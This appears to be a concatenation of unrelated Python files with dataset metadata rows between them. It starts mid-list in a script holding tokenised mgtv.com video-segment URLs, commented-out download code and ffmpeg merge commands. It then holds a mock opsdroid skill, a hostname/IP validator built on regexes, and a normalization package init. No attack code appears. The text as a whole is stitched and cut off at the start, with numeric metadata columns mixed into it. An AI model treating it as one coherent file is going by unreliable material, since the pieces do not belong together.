~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/413797F67F2DE9DA44CD24F0D0F38FA0_1430080_1440080_441_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslS
HPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C55F7C4F092886F24C2B8E6D19D422C7_1440080_1450080_447_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/5C9B0B3C8AA6F5D011FD4196F8A86A88_1450080_1460080_1009_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid
~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/BC54858DC0CF98BDF94E070C06DC3713_1460080_1470080_1485_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/70B22A56A9D502EAA9A6B0903725B265_1470080_1480080_1524_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C58869235AC160B79FC4381CCBA62CFA_1480080_1490080_719_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0
JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/CFACD371A48385CFD58087F85C034496_1490080_1500080_444_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/B2274FFC3028B31949249D382B2EB75C_1500080_1507520_420_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~
aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3"]
# print(len(js_list))
# num=0
# for aim_url in js_list:
#     aim_response = requests.get(aim_url)
#     # os.path.join() discards earlier components when a later one is absolute,
#     # so wrapping the absolute target in os.path.dirname(__file__) was redundant.
#     f = open('D:/github/1/hotpoor_autoclick_xhs/videos/%s.%s' % (num, "mp4"), "ab")
#     f.write(aim_response.content)  # write the binary media content
#     f.close()
#     num += 1
# ffmpeg -i "concat:0.mp4|1.mp4|2.mp4|3.mp4|4.mp4|5.mp4|6.mp4|7.mp4|8.mp4|9.mp4|10.mp4|11.mp4|12.mp4|13.mp4|14.mp4|15.mp4|16.mp4|17.mp4|18.mp4|19.mp4|20.mp4|21.mp4|22.mp4|23.mp4|24.mp4|25.mp4|26.mp4|27.mp4|28.mp4|29.mp4|30.mp4|31.mp4|32.mp4|33.mp4|34.mp4|35.mp4|36.mp4|37.mp4|38.mp4|39.mp4|40.mp4|41.mp4|42.mp4|43.mp4|44.mp4|45.mp4|46.mp4|47.mp4|48.mp4|49.mp4|50.mp4|51.mp4|52.mp4|53.mp4|54.mp4|55.mp4|56.mp4|57.mp4|58.mp4|59.mp4|60.mp4|61.mp4|62.mp4|63.mp4|64.mp4|65.mp4|66.mp4|67.mp4|68.mp4|69.mp4|70.mp4|71.mp4|72.mp4|73.mp4|74.mp4|75.mp4|76.mp4|77.mp4|78.mp4|79.mp4|80.mp4|81.mp4|82.mp4|83.mp4|84.mp4|85.mp4|86.mp4|87.mp4|88.mp4|89.mp4|90.mp4|91.mp4|92.mp4|93.mp4|94.mp4|95.mp4|96.mp4|97.mp4|98.mp4|99.mp4|100.mp4|101.mp4|102.mp4|103.mp4|104.mp4|105.mp4|106.mp4|107.mp4|108.mp4|109.mp4|110.mp4|111.mp4|112.mp4|113.mp4|114.mp4|115.mp4|116.mp4|117.mp4|118.mp4|119.mp4|120.mp4|121.mp4|122.mp4|123.mp4|124.mp4|125.mp4|126.mp4|127.mp4|128.mp4|129.mp4|130.mp4|131.mp4|132.mp4|133.mp4|134.mp4|135.mp4|136.mp4|137.mp4|138.mp4|139.mp4|140.mp4|141.mp4|142.mp4|143.mp4|144.mp4|145.mp4|146.mp4|147.mp4|148.mp4|149.mp4|150.mp4|151.mp4" -acodec copy -vcodec copy -absf aac_adtstoasc out.mp4
# ffmpeg -i "concat:f00282urkwd.321002.1.ts|f00282urkwd.321002.2.ts|f00282urkwd.321002.3.ts|f00282urkwd.321002.4.ts|f00282urkwd.321002.5.ts|f00282urkwd.321002.6.ts|f00282urkwd.321002.7.ts|f00282urkwd.321002.8.ts|f00282urkwd.321002.9.ts|f00282urkwd.321002.10.ts|f00282urkwd.321002.11.ts|f00282urkwd.321002.12.ts|f00282urkwd.321002.13.ts|f00282urkwd.321002.14.ts|f00282urkwd.321002.15.ts|f00282urkwd.321002.16.ts|f00282urkwd.321002.17.ts" -c copy output.mp4
print(os.listdir('D:/github/1/hotpoor_autoclick_xhs/videos')) | 8,303.933333 | 122,524 | 0.937114 | 9,272 | 124,559 | 12.308671 | 0.075065 | 0.017314 | 0.023974 | 0.029301 | 0.923909 | 0.923909 | 0.923909 | 0.92333 | 0.92333 | 0.92333 | 0 | 0.224464 | 0.00061 | 124,559 | 15 | 122,525 | 8,303.933333 | 0.692336 | 0.015447 | 0 | 0 | 0 | 38 | 0.995719 | 0.000326 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0.25 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 13 |
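The commented-out workflow above (download each `.ts` segment, then merge with ffmpeg's `concat:` protocol) can be sketched as a small runnable helper. This is a hedged reconstruction, not the original script: `download_segments`, `build_concat_arg`, the output directory, and the `requests` dependency are illustrative assumptions.

```python
import os
import subprocess  # assumed: ffmpeg is available on PATH when merging


def build_concat_arg(filenames):
    # ffmpeg's concat protocol takes "concat:a.ts|b.ts|c.ts" as the input;
    # a trailing "|" would make ffmpeg look for an empty filename, so join cleanly.
    return "concat:" + "|".join(filenames)


def download_segments(urls, out_dir):
    # Download each segment URL to a numbered .ts file; returns the file paths.
    # requests is a third-party dependency, assumed installed.
    import requests
    paths = []
    for i, url in enumerate(urls):
        path = os.path.join(out_dir, "%d.ts" % i)
        resp = requests.get(url, timeout=30)
        resp.raise_for_status()
        with open(path, "wb") as f:
            f.write(resp.content)  # binary media content
        paths.append(path)
    return paths


def merge_segments(paths, out_file):
    # Stream-copy the segments into one file, fixing the AAC bitstream for MP4,
    # mirroring the commented ffmpeg command above.
    subprocess.run(
        ["ffmpeg", "-i", build_concat_arg(paths),
         "-c", "copy", "-bsf:a", "aac_adtstoasc", out_file],
        check=True,
    )
```

Keeping the concat-string construction in its own function avoids the trailing-pipe mistake that hand-built command lines are prone to.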
b0e39d8c566de915360043c5729752c854232ad8 | 118 | py | Python | opsdroid/testing/mockmodules/skills/temp_skill.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 712 | 2016-08-09T21:30:07.000Z | 2022-03-24T09:38:21.000Z | opsdroid/testing/mockmodules/skills/temp_skill.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 1,767 | 2016-07-27T13:01:25.000Z | 2022-03-29T04:25:10.000Z | opsdroid/testing/mockmodules/skills/temp_skill.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 536 | 2016-07-31T14:23:41.000Z | 2022-03-22T17:35:15.000Z | """A mocked skill."""
from opsdroid.skill import Skill
class TestSkill(Skill):
"""A mocked skill."""
pass
| 11.8 | 32 | 0.635593 | 15 | 118 | 5 | 0.6 | 0.186667 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.211864 | 118 | 9 | 33 | 13.111111 | 0.806452 | 0.262712 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
b048ecbdd5e0d56a57a66a258969856a5d344cc2 | 2,886 | py | Python | xpathwebdriver/validators.py | nicolasmendoza/xpathwebdriver | c0d0e1f9fc013a1aa99f6061afd21f3c167558aa | [
"MIT"
] | 2 | 2019-04-18T10:24:00.000Z | 2021-02-27T16:41:24.000Z | xpathwebdriver/validators.py | nicolasmendoza/xpathwebdriver | c0d0e1f9fc013a1aa99f6061afd21f3c167558aa | [
"MIT"
] | null | null | null | xpathwebdriver/validators.py | nicolasmendoza/xpathwebdriver | c0d0e1f9fc013a1aa99f6061afd21f3c167558aa | [
"MIT"
] | 1 | 2017-04-18T05:46:00.000Z | 2017-04-18T05:46:00.000Z | # -*- coding: utf-8 -*-
'''
'''
import re
localhost = re.compile('localhost')
pattern = re.compile(
r'^(([a-zA-Z]{1})|([a-zA-Z]{1}[a-zA-Z]{1})|'
r'([a-zA-Z]{1}[0-9]{1})|([0-9]{1}[a-zA-Z]{1})|'
r'([a-zA-Z0-9][-_.a-zA-Z0-9]{0,61}[a-zA-Z0-9]))\.'
r'([a-zA-Z]{2,13}|[a-zA-Z0-9-]{2,30}.[a-zA-Z]{2,3})$'
)
ip_pattern = re.compile(
r'^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}'
'([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$'
)
#from https://gist.github.com/mnordhoff/2213179
ip6_pattern = re.compile('^(?:(?:[0-9A-Fa-f]{1,4}:){6}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|::(?:[0-9A-Fa-f]{1,4}:){5}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){4}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){3}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,2}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){2}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,3}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}:(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,4}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,5}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}|(?:(?:[0-9A-Fa-f]{1,4}:){,6}[0-9A-Fa-f]{1,4})?::)$')
def is_valid_netloc(value):
'''
Return whether or not given value is a valid domain or ip address.
'''
if ']:' in value:
value = value.split('[')[1].split(']:')[0]
elif value.count(':') == 1:
value = value.split(':')[0]
return (pattern.match(value)
or ip_pattern.match(value)
or ip6_pattern.match(value)
or localhost.match(value))
def smoke_test_module():
import rel_imp; rel_imp.init()
from .logger import log_test
log_test(is_valid_netloc('ble'))
log_test(is_valid_netloc('google.com'))
log_test(is_valid_netloc('10.0.1.1:8080'))
log_test(is_valid_netloc('2001:db8:85a3:8d3:1319:8a2e:370:7348'))
log_test(is_valid_netloc('[2001:db8:85a3:8d3:1319:8a2e:370:7348]:8000'))
if __name__ == "__main__":
smoke_test_module()
| 57.72 | 1,536 | 0.46431 | 722 | 2,886 | 1.804709 | 0.108033 | 0.101305 | 0.078281 | 0.156562 | 0.605526 | 0.553338 | 0.553338 | 0.553338 | 0.531082 | 0.531082 | 0 | 0.211459 | 0.080735 | 2,886 | 49 | 1,537 | 58.897959 | 0.279683 | 0.046778 | 0 | 0 | 0 | 0.21875 | 0.705537 | 0.687202 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.09375 | 0 | 0.1875 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c68c4da2f74f4bfed0d132ea47251ce1d0c15706 | 147 | py | Python | normalization/__init__.py | DanielMorales9/LinearRegression | 7c905e5317a2eb4cc3b2cab275bbcec8e9db57f9 | [
"MIT"
] | null | null | null | normalization/__init__.py | DanielMorales9/LinearRegression | 7c905e5317a2eb4cc3b2cab275bbcec8e9db57f9 | [
"MIT"
] | null | null | null | normalization/__init__.py | DanielMorales9/LinearRegression | 7c905e5317a2eb4cc3b2cab275bbcec8e9db57f9 | [
"MIT"
] | null | null | null | from .normalization import MeanNormalization
from .normalization import ZScoreNormalization
__all__ = ["MeanNormalization", "ZScoreNormalization"] | 36.75 | 54 | 0.85034 | 11 | 147 | 11 | 0.545455 | 0.280992 | 0.380165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081633 | 147 | 4 | 54 | 36.75 | 0.896296 | 0 | 0 | 0 | 0 | 0 | 0.243243 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |